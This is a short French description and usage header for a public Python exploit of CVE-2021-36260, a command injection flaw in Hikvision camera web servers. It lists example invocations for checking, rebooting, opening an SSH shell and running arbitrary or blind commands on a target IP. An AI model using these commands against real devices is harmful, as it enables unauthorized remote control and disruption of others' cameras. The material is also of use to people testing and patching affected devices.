
Exploit Python pour l'injection de commandes CVE-2021-36260 dans les serveurs web Hikvision. Prend en charge la vérification de vulnérabilité sécurisée/non sécurisée, l'exécution de commandes à distance et l'accès au shell SSH sur les appareils IoT.
CVE-2021-36260 POC vulnérabilité d'injection de commande dans le serveur web de certains produits Hikvision. En raison d'une validation d'entrée insuffisante, un attaquant peut exploiter la vulnérabilité pour lancer une attaque d'injection de commande en envoyant des messages avec des commandes malveillantes.
Exploit Title: Hikvision Web Server Build 210702 - Injection de commande
Exploit Author: bashis -- correction d'erreurs par shubtheone
Vendor Homepage: https://www.hikvision.com/
Version: 1.0
CVE: CVE-2021-36260
Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Remarque :
[Exemples] Safe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Unsafe vulnerability/verify check: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Launch and connect to SSH shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Execute command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Execute blind command: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"